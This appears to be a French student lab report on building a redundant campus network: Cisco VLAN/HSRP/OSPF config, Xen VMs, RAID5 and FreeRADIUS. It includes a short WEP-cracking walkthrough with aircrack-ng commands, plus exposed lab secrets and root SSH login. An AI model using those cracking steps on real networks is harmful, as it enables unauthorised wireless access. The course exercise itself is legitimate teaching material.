  standby 18 preempt&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan19&lt;br /&gt;
  ip address 10.60.19.252 255.255.255.0&lt;br /&gt;
  ipv6 address prefix 2001:660:4401:60C9::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60C9::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 19 ip 10.60.19.254&lt;br /&gt;
  standby 19 preempt&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan20&lt;br /&gt;
  ip address 10.60.20.252 255.255.255.0&lt;br /&gt;
  ipv6 address prefix 2001:660:4401:60CA::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60CA::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 20 ip 10.60.20.254&lt;br /&gt;
  standby 20 preempt&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan21&lt;br /&gt;
  ip address 10.60.21.252 255.255.255.0&lt;br /&gt;
  ipv6 address prefix 2001:660:4401:60CB::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60CB::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 21 ip 10.60.21.254&lt;br /&gt;
  standby 21 preempt&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan43&lt;br /&gt;
  ip address 193.48.57.188 255.255.255.240&lt;br /&gt;
  ipv6 address 2001:660:4401:60C0::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60C0::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 22 ip 193.48.57.190&lt;br /&gt;
  standby 22 preempt&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan131&lt;br /&gt;
  ip address 192.168.222.9 255.255.255.248&lt;br /&gt;
  ipv6 address FE80::2 link-local&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 rip tpima2a5 enable&lt;br /&gt;
 !&lt;br /&gt;
 router ospf 1&lt;br /&gt;
  router-id 10.60.11.252&lt;br /&gt;
  log-adjacency-changes&lt;br /&gt;
  summary-address 193.48.57.176 255.255.255.240&lt;br /&gt;
  summary-address 192.168.0.0 255.255.255.0 not-advertise&lt;br /&gt;
  summary-address 10.60.0.0 255.255.0.0 not-advertise&lt;br /&gt;
  redistribute connected subnets&lt;br /&gt;
  network 192.168.222.8 0.0.0.7 area 2&lt;br /&gt;
 !&lt;br /&gt;
 [...]&lt;br /&gt;
 ipv6 router rip tpima5sc&lt;br /&gt;
  redistribute connected metric 1&lt;br /&gt;
  redistribute static metric 1&lt;br /&gt;
 !&lt;br /&gt;
 [...]&lt;br /&gt;
 end&lt;br /&gt;
&lt;br /&gt;
====== Show Interface status ======&lt;br /&gt;
&lt;br /&gt;
* &amp;lt;code&amp;gt; show int status &amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
 Port      Name               Status       Vlan       Duplex  Speed Type&lt;br /&gt;
 Gi0/1                        connected    trunk      a-full  a-100 10/100/1000BaseTX            // Vers C1&lt;br /&gt;
 Gi0/2                        connected    trunk      a-full  a-100 10/100/1000BaseTX            // Vers C1&lt;br /&gt;
 Gi0/3                        connected    trunk      a-full  a-100 10/100/1000BaseTX            // Vers C1&lt;br /&gt;
 Gi0/4                        connected    trunk      a-full  a-100 10/100/1000BaseTX            // Vers C1&lt;br /&gt;
 Gi0/5                        connected    trunk      a-full  a-100 10/100/1000BaseTX            // Vers C1&lt;br /&gt;
 Gi0/6                        connected    trunk      a-full  a-100 10/100/1000BaseTX            // Vers C1&lt;br /&gt;
 Gi0/7                        connected    trunk      a-full  a-100 10/100/1000BaseTX            // Vers C1&lt;br /&gt;
 Gi0/8                        connected    trunk      a-full  a-100 10/100/1000BaseTX            // Vers C1&lt;br /&gt;
 Gi0/9                        connected    trunk      a-full  a-100 10/100/1000BaseTX            // Vers C1&lt;br /&gt;
 Gi0/10                       connected    trunk      a-full  a-100 10/100/1000BaseTX            // Vers C1&lt;br /&gt;
 &lt;br /&gt;
 Gi0/11                       connected    trunk      a-full a-1000 10/100/1000BaseTX            // Vers C2&lt;br /&gt;
 &lt;br /&gt;
 Gi0/12                       notconnect   1            auto   auto 10/100/1000BaseTX            // Borne Wi-Fi du groupe 1&lt;br /&gt;
 &lt;br /&gt;
 Gi0/13                       notconnect   1            auto   auto 10/100/1000BaseTX            &lt;br /&gt;
 Gi0/14                       notconnect   1            auto   auto 10/100/1000BaseTX            &lt;br /&gt;
 [...]                        //           //           //     //   //&lt;br /&gt;
 Gi0/47                       notconnect   1            auto   auto 10/100/1000BaseTX            &lt;br /&gt;
 Gi0/48                       notconnect   1            auto   auto 10/100/1000BaseTX  &lt;br /&gt;
           &lt;br /&gt;
 Te0/1                        connected    131          full    10G 10GBase-SR                   // Vers SR52&lt;br /&gt;
 Te0/2                        connected    43           full    10G 10GBase-SR                   // Vers Cordouan&lt;br /&gt;
&lt;br /&gt;
====== IPv6 ======&lt;br /&gt;
&lt;br /&gt;
* &amp;lt;code&amp;gt; show ipv6 route &amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
 Switch#show ipv6 route&lt;br /&gt;
 IPv6 Routing Table - Default - 53 entries&lt;br /&gt;
 Codes: C - Connected, L - Local, S - Static, U - Per-user Static route&lt;br /&gt;
        B - BGP, R - RIP, D - EIGRP, EX - EIGRP external&lt;br /&gt;
        O - OSPF Intra, OI - OSPF Inter, OE1 - OSPF ext 1, OE2 - OSPF ext 2&lt;br /&gt;
        ON1 - OSPF NSSA ext 1, ON2 - OSPF NSSA ext 2&lt;br /&gt;
 R   ::/0 [120/2]&lt;br /&gt;
      via FE80::42:1, Vlan131&lt;br /&gt;
 R   2001:660:4401:60::/64 [120/2]&lt;br /&gt;
      via FE80::42:1, Vlan131&lt;br /&gt;
 R   2001:660:4401:6000::/56 [120/2]&lt;br /&gt;
      via FE80::42:1, Vlan131&lt;br /&gt;
 R   2001:660:4401:6002::/64 [120/2]&lt;br /&gt;
      via FE80::42:1, Vlan131&lt;br /&gt;
 R   2001:660:4401:6003::/64 [120/2]&lt;br /&gt;
      via FE80::42:1, Vlan131&lt;br /&gt;
 R   2001:660:4401:6004::/64 [120/2]&lt;br /&gt;
      via FE80::42:1, Vlan131&lt;br /&gt;
 R   2001:660:4401:6005::/64 [120/2]&lt;br /&gt;
      via FE80::42:1, Vlan131&lt;br /&gt;
 R   2001:660:4401:6006::/64 [120/2]&lt;br /&gt;
      via FE80::42:1, Vlan131&lt;br /&gt;
 R   2001:660:4401:6007::/64 [120/2]&lt;br /&gt;
      via FE80::42:1, Vlan131&lt;br /&gt;
 R   2001:660:4401:6008::/64 [120/2]&lt;br /&gt;
      via FE80::42:1, Vlan131&lt;br /&gt;
 R   2001:660:4401:6009::/64 [120/2]&lt;br /&gt;
      via FE80::42:1, Vlan131&lt;br /&gt;
 R   2001:660:4401:6011::/64 [120/2]&lt;br /&gt;
&lt;br /&gt;
====== IPv4 ======&lt;br /&gt;
&lt;br /&gt;
* &amp;lt;code&amp;gt; show ip route &amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Nous avons bien de l'OSPF ('''O''') et OSPF NSSA external type 2 ('''E2''')&lt;br /&gt;
&lt;br /&gt;
 Switch#sh ip route&lt;br /&gt;
 Codes: C - connected, S - static, R - RIP, M - mobile, B - BGP&lt;br /&gt;
        D - EIGRP, EX - EIGRP external, O - OSPF, IA - OSPF inter area &lt;br /&gt;
        N1 - OSPF NSSA external type 1, N2 - OSPF NSSA external type 2&lt;br /&gt;
        E1 - OSPF external type 1, E2 - OSPF external type 2&lt;br /&gt;
        i - IS-IS, su - IS-IS summary, L1 - IS-IS level-1, L2 - IS-IS level-2&lt;br /&gt;
        ia - IS-IS inter area, * - candidate default, U - per-user static route&lt;br /&gt;
        o - ODR, P - periodic downloaded static route&lt;br /&gt;
 &lt;br /&gt;
 Gateway of last resort is 192.168.222.14 to network 0.0.0.0&lt;br /&gt;
 &lt;br /&gt;
      193.51.182.0/30 is subnetted, 1 subnets&lt;br /&gt;
 O E2    193.51.182.108 [110/20] via 192.168.222.14, 00:29:30, Vlan131&lt;br /&gt;
 O E2 192.168.12.0/24 [110/10] via 192.168.222.14, 00:29:30, Vlan131&lt;br /&gt;
 O E2 192.168.29.0/24 [110/10] via 192.168.222.14, 00:29:30, Vlan131&lt;br /&gt;
 O E2 192.168.28.0/24 [110/10] via 192.168.222.14, 00:29:30, Vlan131&lt;br /&gt;
      193.48.63.0/24 is variably subnetted, 2 subnets, 2 masks&lt;br /&gt;
 O E2    193.48.63.0/26 [110/10] via 192.168.222.14, 00:29:30, Vlan131&lt;br /&gt;
 O IA    193.48.63.1/32 [110/13] via 192.168.222.14, 00:29:31, Vlan131&lt;br /&gt;
 O IA 193.49.225.0/24 [110/3] via 192.168.222.14, 00:29:31, Vlan131&lt;br /&gt;
      192.168.44.0/29 is subnetted, 4 subnets&lt;br /&gt;
 O E2    192.168.44.0 [110/10] via 192.168.222.14, 00:29:31, Vlan131&lt;br /&gt;
 O E2    192.168.44.8 [110/10] via 192.168.222.14, 00:29:31, Vlan131&lt;br /&gt;
 O E2    192.168.44.32 [110/10] via 192.168.222.14, 00:29:31, Vlan131&lt;br /&gt;
&lt;br /&gt;
====Sécurisation des données via RAID5====&lt;br /&gt;
=====Les partitions=====&lt;br /&gt;
&lt;br /&gt;
Création des trois partitions 1G,&lt;br /&gt;
&lt;br /&gt;
  lvcreate -L1G -n IMA5_Dionysos_part1 virtual&lt;br /&gt;
  lvcreate -L1G -n IMA5_Dionysos_part2 virtual&lt;br /&gt;
  lvcreate -L1G -n IMA5_Dionysos_part3 virtual&lt;br /&gt;
&lt;br /&gt;
Ajout de ces partitions lors de la création de la VM, dans le fichier Dionysos.cfg:&lt;br /&gt;
  &lt;br /&gt;
  disk        = [&lt;br /&gt;
                  'file:/usr/local/xen/domains/Dionysos/disk.img,xvda2,w',&lt;br /&gt;
                  'file:/usr/local/xen/domains/Dionysos/swap.img,xvda1,w',&lt;br /&gt;
                  'phy:/dev/virtual/IMA5_Dionysos_var,xvdb2,w'&lt;br /&gt;
                  'phy:/dev/virtual/IMA5_Dionysos_part1,xvdf1,w',&lt;br /&gt;
                  'phy:/dev/virtual/IMA5_Dionysos_part2,xvdg1,w',&lt;br /&gt;
                  'phy:/dev/virtual/IMA5_Dionysos_part3,xvdh1,w',&lt;br /&gt;
  ]&lt;br /&gt;
&lt;br /&gt;
=====Création du RAID=====&lt;br /&gt;
Création du RAID5 à l'aide de mdadm&lt;br /&gt;
  sudo mdadm --create /dev/md0 --level=5 --assume-clean --raid-devices=4 /dev/sdb1 /dev/sdc1 /dev/sdd1 /dev/sde1&lt;br /&gt;
&lt;br /&gt;
Lors du premier essai l'erreur suivante est apparue  &lt;br /&gt;
  mdadm: cannot open /dev/xvdf1: Device or resource busy&lt;br /&gt;
&lt;br /&gt;
Après quelques recherches, j'ai consulté le fichier /proc/mdstat&lt;br /&gt;
  root@Dionysos:~# cat /proc/mdstat&lt;br /&gt;
  Personalities : [linear] [multipath] [raid0] [raid1] [raid6] [raid5] [raid4] [raid10] &lt;br /&gt;
  md127 : active (auto-read-only) raid5 xvdg1[0] xvdf1[2]&lt;br /&gt;
        2093056 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/2] [U_U]&lt;br /&gt;
        &lt;br /&gt;
  unused devices: &amp;lt;none&amp;gt;&lt;br /&gt;
&lt;br /&gt;
J'ai donc arrêté md127 grâce à &lt;br /&gt;
   mdadm --stop /dev/md127&lt;br /&gt;
&lt;br /&gt;
Puis j'ai relancé la commande de création du RAID&lt;br /&gt;
&lt;br /&gt;
En relisant /proc/mdstat, j'ai obtenu &lt;br /&gt;
  Personalities : [linear] [multipath] [raid0] [raid1] [raid6] [raid5] [raid4] [raid10] &lt;br /&gt;
  md0 : active raid5 xvdh1[2] xvdg1[1] xvdf1[0]&lt;br /&gt;
        2093056 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/3] [UUU]&lt;br /&gt;
&lt;br /&gt;
Daemonisation du volume RAID, pour que la VM le charge à chaque redémarrage&lt;br /&gt;
  mdadm --monitor --daemonise /dev/md0&lt;br /&gt;
&lt;br /&gt;
On formate le RAID&lt;br /&gt;
  root@Dionysos:~#mkfs.ext4 /dev/md0&lt;br /&gt;
  mke2fs 1.44.4 (18-Aug-2018)&lt;br /&gt;
  Creating filesystem with 523264 4k blocks and 130816 inodes&lt;br /&gt;
  Filesystem UUID: e7b32d68-7297-4957-9104-574fff233b93&lt;br /&gt;
  Superblock backups stored on blocks: 32768, 98304, 163840, 229376, 294912&lt;br /&gt;
  &lt;br /&gt;
  Allocating group tables: done                            &lt;br /&gt;
  Writing inode tables: done                            &lt;br /&gt;
  Creating journal (8192 blocks): done&lt;br /&gt;
  Writing superblocks and filesystem accounting information: done&lt;br /&gt;
&lt;br /&gt;
Dans le fichier /etc/fstab, nous demandons à notre VM de monter le volume à chaque redémarrage&lt;br /&gt;
  /dev/md0        /media/raid     ext4     defaults       0       1&lt;br /&gt;
&lt;br /&gt;
Puis nous créons un dossier&lt;br /&gt;
  mkdir /media/raid&lt;br /&gt;
&lt;br /&gt;
Dans ce fichier, nous créons un simple fichier texte blabla.txt&lt;br /&gt;
&lt;br /&gt;
Comme demandé dans le sujet, j'ai arrêté ma VM. Puis je l'ai relancée, en désactivant une des partitions : xvdh1&lt;br /&gt;
&lt;br /&gt;
Résultat, dans le dossier /media/raid&lt;br /&gt;
  root@Dionysos:/media/raid# ls&lt;br /&gt;
  lost+found&lt;br /&gt;
&lt;br /&gt;
====Sécurisation Wifi par WPA2-EAP====&lt;br /&gt;
&lt;br /&gt;
Installation de freeradius &lt;br /&gt;
  apt-get install freeradius&lt;br /&gt;
&lt;br /&gt;
Dans le fichier /etc/freeradius/3.0/users on ajoute la ligne&lt;br /&gt;
&lt;br /&gt;
  Dionysos Cleartext-Password :=NOTRE_MDP_ROOT&lt;br /&gt;
&lt;br /&gt;
Le serveur doit être configuré en PEAP-MSCHAPv2. Nous devons modifier :&lt;br /&gt;
&lt;br /&gt;
-/etc/freeradius/3.0/mods-enabled/eap&lt;br /&gt;
  default_eap_type = peap&lt;br /&gt;
&lt;br /&gt;
-etc/freeradius/3.0/mods-enabled/mschap&lt;br /&gt;
  mschap {&lt;br /&gt;
     ...&lt;br /&gt;
     use_mppe = yes&lt;br /&gt;
     require_encryption = yes&lt;br /&gt;
     require_strong = yes&lt;br /&gt;
  }&lt;br /&gt;
&lt;br /&gt;
Dans cette même section nous ajoutons la ligne  &lt;br /&gt;
  with_ntdomain_hack = yes&lt;br /&gt;
&lt;br /&gt;
On ajoute les points d'accès dans notre configuration de serveur (fichier : /etc/freeradius/3.0/clients.conf) :&lt;br /&gt;
client 192.168.0.10/32&lt;br /&gt;
{&lt;br /&gt;
  secret = secretIMA5SC&lt;br /&gt;
  shortname = accesDionysos&lt;br /&gt;
}&lt;br /&gt;
&lt;br /&gt;
====Crack WEP====&lt;br /&gt;
&lt;br /&gt;
* récuperer l'interface wifi&lt;br /&gt;
&lt;br /&gt;
 ip a&lt;br /&gt;
&lt;br /&gt;
* mettre l'interface en écoute et récupérer le nouveau nom de l'interface (&amp;lt;interface2&amp;gt;)&lt;br /&gt;
&lt;br /&gt;
 airmon-ng start &amp;lt;interface&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* récupérer le '''Channel''' et le '''BSSID'''&lt;br /&gt;
&lt;br /&gt;
 airodump &amp;lt;interface2&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* récupérer des &amp;lt;code&amp;gt;#Data&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
 airodump-ng -c &amp;lt;CHANNEL&amp;gt; --bssid &amp;lt;BSSID&amp;gt; -w crack_wep &amp;lt;interface2&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* lancer un spam de paquets ARP&lt;br /&gt;
&lt;br /&gt;
 aireplay-ng --fakeauth 30 -a &amp;lt;BSSID&amp;gt; &amp;lt;interface&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* lancer le crack&lt;br /&gt;
&lt;br /&gt;
 aircrack-ng crack_wep01.cap&lt;br /&gt;
&lt;br /&gt;
* resultat si assez de #Data&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Jdqb aircrack.png]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Les étapes ==&lt;br /&gt;
&lt;br /&gt;
=== Introduction ===&lt;br /&gt;
&lt;br /&gt;
=== Installation des systèmes d'exploitation ===&lt;br /&gt;
&lt;br /&gt;
==== Installation dans la machine virtuelle Xen ====&lt;br /&gt;
&lt;br /&gt;
* L'accès se fait par SSH sur le dom0 &amp;lt;code&amp;gt;cordouan.insecserv.deule.net&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
===== Création d'une machine virtuelle Xen Linux sur Cordouan =====&lt;br /&gt;
&lt;br /&gt;
Pour ce faire, il faut utiliser la commande &amp;lt;code&amp;gt;xen-create-image&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Notre commande : &amp;lt;code&amp;gt;xen-create-image --hostname=Dionysos --ip=193.48.57.178 --netmask=255.255.255.240 --dir=/usr/local/xen&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* &amp;lt;code&amp;gt;--hostname=&amp;lt;/code&amp;gt; : Le nom de votre machine&lt;br /&gt;
* &amp;lt;code&amp;gt;--ip=&amp;lt;/code&amp;gt; : L'ip routée qui vous a été attribué lors de la réalisation du '''plan d'adressage'''  &lt;br /&gt;
* &amp;lt;code&amp;gt;--netmask=&amp;lt;/code&amp;gt; : Le masque réseau du plan d'adressage&lt;br /&gt;
* &amp;lt;code&amp;gt;--dir=&amp;lt;/code&amp;gt; : l'emplacement des fichiers '''disk.img'''  et '''swap.img'''. Dans le sous répertoire &amp;lt;code&amp;gt;domains/Dionysos&amp;lt;/code&amp;gt; dans notre cas&lt;br /&gt;
&lt;br /&gt;
===== Modification du fichier de configuration de la machine virtuelle =====&lt;br /&gt;
&lt;br /&gt;
On retrouve ensuite le fichier de configuration '''.cfg''' de la VM à l'emplacement &amp;lt;code&amp;gt;/etc/xen&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* &amp;lt;code&amp;gt; nano /etc/xen/Dionysos.cfg&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
 [...]&lt;br /&gt;
 #&lt;br /&gt;
 #  Disk device(s).&lt;br /&gt;
 #&lt;br /&gt;
 root        = '/dev/xvda2 ro'&lt;br /&gt;
 disk        = [&lt;br /&gt;
                  'file:/usr/local/xen/domains/Dionysos/disk.img,xvda2,w',&lt;br /&gt;
                  'file:/usr/local/xen/domains/Dionysos/swap.img,xvda1,w',&lt;br /&gt;
                  'phy:/dev/virtual/IMA5_Dionysos_var,xvdb2,w',                  # Partition LVM pour /var&lt;br /&gt;
                  'phy:/dev/virtual/IMA5_Dionysos_home,xvdb1,w',                 # Partition LVM pour /home&lt;br /&gt;
 &lt;br /&gt;
      ]&lt;br /&gt;
 [...]&lt;br /&gt;
 #&lt;br /&gt;
 #  Networking&lt;br /&gt;
 #&lt;br /&gt;
 vif         = [ 'ip=193.48.57.178 ,mac=00:16:3E:6F:61:EE,bridge=IMA5sc' ]       # Ajout du bridge&lt;br /&gt;
 [...]&lt;br /&gt;
&lt;br /&gt;
===== Lancement de la machine =====&lt;br /&gt;
&lt;br /&gt;
Toujours en root depuis cordouan&lt;br /&gt;
&lt;br /&gt;
* Lancement : &amp;lt;code&amp;gt;xl create /etc/xen/Dionysos.cfg&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
À l'issue du premier lancement, on récupère un mot de passe root automatiquement généré&lt;br /&gt;
&lt;br /&gt;
* Une fois lancée : &amp;lt;code&amp;gt;xl console Dionysos&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On arrive donc sur la machine, il y a plusieurs modifications à effectuer :&lt;br /&gt;
&lt;br /&gt;
====== Autoriser le login en root sur la machine via SSH ======&lt;br /&gt;
&lt;br /&gt;
Modification du fichier &amp;lt;code&amp;gt;/etc/ssh/sshd_config&amp;lt;/code&amp;gt; nous décommentons la ligne &amp;lt;code&amp;gt;PermitRootLogin yes&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* Modifier le mot de passe root : &amp;lt;code&amp;gt;passwd&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
====== Réglage du réseau ======&lt;br /&gt;
&lt;br /&gt;
* Modification du fichier &amp;lt;code&amp;gt;/etc/network/interfaces&amp;lt;/code&amp;gt; pour ajouter &amp;lt;code&amp;gt;gateway 193.48.57.190&amp;lt;/code&amp;gt; à l'interface eth0&lt;br /&gt;
&lt;br /&gt;
 [...]&lt;br /&gt;
 # The primary network interface&lt;br /&gt;
 auto eth0&lt;br /&gt;
 iface eth0 inet static&lt;br /&gt;
  address 193.48.57.178&lt;br /&gt;
  netmask 255.255.255.240&lt;br /&gt;
  gateway 193.48.57.190&lt;br /&gt;
 [...]&lt;br /&gt;
&lt;br /&gt;
On éteint puis allume à nouveau l'interface avec &amp;lt;code&amp;gt;ifdown eth0&amp;lt;/code&amp;gt; et &amp;lt;code&amp;gt;ifup eth0&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* Ajout de la route par défaut pour utiliser le routeur virtuel de l'architecture&lt;br /&gt;
&lt;br /&gt;
&amp;lt;code&amp;gt;ip route add default via 193.48.57.190 dev eth0 onlink&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
l'IP '''193.48.57.190''' est celle du routeur virtuel. Elle a été définie lors du plan d'adressage&lt;br /&gt;
&lt;br /&gt;
=== Architecture réseau ===&lt;br /&gt;
&lt;br /&gt;
==== L'architecture générale ====&lt;br /&gt;
&lt;br /&gt;
==== Les réseaux virtuels ====&lt;br /&gt;
&lt;br /&gt;
Mise à disposition d'un réseau IPv4 routé : &amp;lt;code&amp;gt;193.48.57.160/27&amp;lt;/code&amp;gt; dans le VLAN 110 de l'école&lt;br /&gt;
&lt;br /&gt;
Lors de la réalisation de ce TP, le réseau était déjà découpé en deux partie.&lt;br /&gt;
&lt;br /&gt;
La première pour les IMA2A5 : allant de &amp;lt;code&amp;gt;193.48.57.160/28&amp;lt;/code&amp;gt; à &amp;lt;code&amp;gt;193.48.57.175/28&amp;lt;/code&amp;gt;&lt;br /&gt;
La seconde était encore inutilisée : Nous avions donc à disposition les adresses allant de &amp;lt;code&amp;gt;193.48.57.176/28&amp;lt;/code&amp;gt; à &amp;lt;code&amp;gt;193.48.57.191/28&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Avec un masque &amp;lt;code&amp;gt;/28&amp;lt;/code&amp;gt; ('''240''') nous avions donc 16 adresses dans le réseau &amp;lt;code&amp;gt;193.48.57.176/28&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Nous avons donc établi avec le groupe routeur 2 (Binôme 11) le plan d'adressage suivant&lt;br /&gt;
&lt;br /&gt;
* .176 : adresse de réseau&lt;br /&gt;
* .177 à .187 : les adresses IP des machines virtuelles Xen&lt;br /&gt;
* .188 : adresse du '''Routeur 1'''&lt;br /&gt;
* .189 : adresse du '''Routeur 2'''&lt;br /&gt;
* .190 : adresse du '''Routeur Virtuel'''&lt;br /&gt;
* .191 : adresse de diffusion&lt;br /&gt;
&lt;br /&gt;
Nous avions également à utiliser un réseau IPv4 non routé (&amp;lt;code&amp;gt;10.60.0.0/16&amp;lt;/code&amp;gt;) où chaque binôme devait avoir un sous-réseau.&lt;br /&gt;
&lt;br /&gt;
Les IMA2A5 avaient choisi d'utiliser des réseau de la forme : &amp;lt;code&amp;gt;10.60.N.0/24&amp;lt;/code&amp;gt; où '''N''' est le numéro de binôme, variant de 1 à 5 dans leur cas.&lt;br /&gt;
&lt;br /&gt;
Nous avons repris cette idée en prenant la forme &amp;lt;code&amp;gt;10.60.10+N.0/24&amp;lt;/code&amp;gt; avec pour choix, en vue de la configuration des routeurs :&lt;br /&gt;
&lt;br /&gt;
* Adresse du routeur 1 : 10.60.11.252/24&lt;br /&gt;
* Adresse du routeur 2 : 10.60.11.253/24&lt;br /&gt;
* Adresse du routeur virtuel : 10.60.11.254/24&lt;br /&gt;
&lt;br /&gt;
Rappel du plan d'adressage&lt;br /&gt;
&lt;br /&gt;
* [https://wiki-ima.plil.fr/mediawiki//index.php/TP_sysres_IMA5sc_2018/2019 IMA5sc 2018/19]&lt;br /&gt;
&lt;br /&gt;
==== 3.3 Le routage de sites (IPv4) - Routeur Cisco 3560 ====&lt;br /&gt;
&lt;br /&gt;
Nous nous sommes chargés de la configuration du routeur 1, le Cisco 3560.&lt;br /&gt;
&lt;br /&gt;
Comme nous étions situés sur la Zabeth09, nous avons pu utiliser un câble muni d'un adaptateur pour relier en USB la Zabeth au port console du routeur.&lt;br /&gt;
&lt;br /&gt;
Nous avons ensuite utilisé &amp;lt;code&amp;gt;minicom -os&amp;lt;/code&amp;gt; en '''root''' avec les réglages suivants :&lt;br /&gt;
&lt;br /&gt;
* '''/dev/ttyUSB0'''&lt;br /&gt;
* '''9600 8N1'''&lt;br /&gt;
* Hardware Flow Control : '''No'''&lt;br /&gt;
&lt;br /&gt;
On arrive ensuite sur le routeur. '''Switch&amp;gt;'''&lt;br /&gt;
&lt;br /&gt;
Rappel des commandes Cisco utiles (ou [https://tvantroys.plil.fr/IMA4/network/ Cours de réseau IMA4]&lt;br /&gt;
&lt;br /&gt;
* &amp;lt;code&amp;gt;enable&amp;lt;/code&amp;gt; : permet de passer en EXEC privilégié sur le Cisco&lt;br /&gt;
* &amp;lt;code&amp;gt;configure terminal&amp;lt;/code&amp;gt; : peut aussi être remplacé par &amp;lt;code&amp;gt;conf t&amp;lt;/code&amp;gt; pour passer en mode de configuration globale&lt;br /&gt;
* &amp;lt;code&amp;gt;exit&amp;lt;/code&amp;gt; : pour retourner à un niveau prédédent&lt;br /&gt;
* &amp;lt;code&amp;gt;write&amp;lt;/code&amp;gt; : au niveau privilégié de base, permet de sauvegarder la configuration&lt;br /&gt;
* &amp;lt;code&amp;gt;interface NOM_INTERFACE&amp;lt;/code&amp;gt; : pour configurer  une interface (peut aussi s'écrire &amp;lt;code&amp;gt;int NOM_INTERFACE&amp;lt;/code&amp;gt;)&lt;br /&gt;
* &amp;lt;code&amp;gt;?&amp;lt;/code&amp;gt; : pour afficher les commandes possibles au niveau actuel&lt;br /&gt;
&lt;br /&gt;
Dans cette partie on s'intéresse à la configuration des interfaces en IPv4 :&lt;br /&gt;
&lt;br /&gt;
Au niveau de l'architecture, nous voulons que le réseau soit redondant, ainsi il faut que les deux routeurs puissent effectuer le même travail mais pas en même temps.&lt;br /&gt;
&lt;br /&gt;
L'un des deux réalise le travail (il est prioritaire) et l'autre vérifie que le travail est effectué, en cas d'arrêt, il prend le relais.&lt;br /&gt;
&lt;br /&gt;
Dans notre cas, le groupe 11 (routeur 2) a décidé de mettre une priorité basse dans la configuration de leur routeur.&lt;br /&gt;
&lt;br /&gt;
Rappel : Le réseau s'organise sur plusieurs VLANs&lt;br /&gt;
&lt;br /&gt;
* VLAN 1 : Pour les autres composants tels que la borne wifi configurée par le groupe 1.&lt;br /&gt;
* VLAN 43 : Il s'agit du VLAN où sont les machines XEN IMA5. Les IMA2A5 avaient opté pour le VLAN 42.&lt;br /&gt;
* VLAN 131 : Le VLAN d'interconnexion de l'école. (SR52), les IMA2A5 utilisent le VLAN 130.&lt;br /&gt;
* VLAN 11 à 21 : Un VLAN par binôme, c'est dans ces VLAN que nous utiliserons les adresses de la forme '''10.60.10+N.X'''. Comme pour les adresses, nous avons opté pour des numéros de la forme 10+Numéro de groupe.&lt;br /&gt;
&lt;br /&gt;
===== Configuration du VLAN 1 =====&lt;br /&gt;
&lt;br /&gt;
Il est juste question d'attribuer au routeur une adresse dans le vlan 1 pour la borne wifi&lt;br /&gt;
&lt;br /&gt;
 interface Vlan1&lt;br /&gt;
  ip address 10.60.1.252 255.255.255.0&lt;br /&gt;
&lt;br /&gt;
===== Configuration du VLAN 43 =====&lt;br /&gt;
&lt;br /&gt;
En partant du mode privilégié :&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan43 &lt;br /&gt;
 int vlan43&lt;br /&gt;
 ip address 193.48.57.188 255.255.255.240&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 22 ip 193.48.57.190&lt;br /&gt;
 standby 22 preempt&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
On commence par supprimer l'interface (&amp;lt;code&amp;gt;no int vlan43&amp;lt;/code&amp;gt;) en cas de doute sur sa configuration puis on la recrée et on attribue au routeur une adresse IP (188 = routeur 1) dans le VLAN (190 = routeur virtuel).&lt;br /&gt;
&lt;br /&gt;
===== Configuration des VLANs 11 à 21 =====&lt;br /&gt;
&lt;br /&gt;
* Remplacer &amp;lt;code&amp;gt;XX&amp;lt;/code&amp;gt; par le numéro du VLAN et &amp;lt;code&amp;gt;N&amp;lt;/code&amp;gt; dans &amp;lt;code&amp;gt;name groupeN&amp;lt;/code&amp;gt; par le numéro du groupe&lt;br /&gt;
&lt;br /&gt;
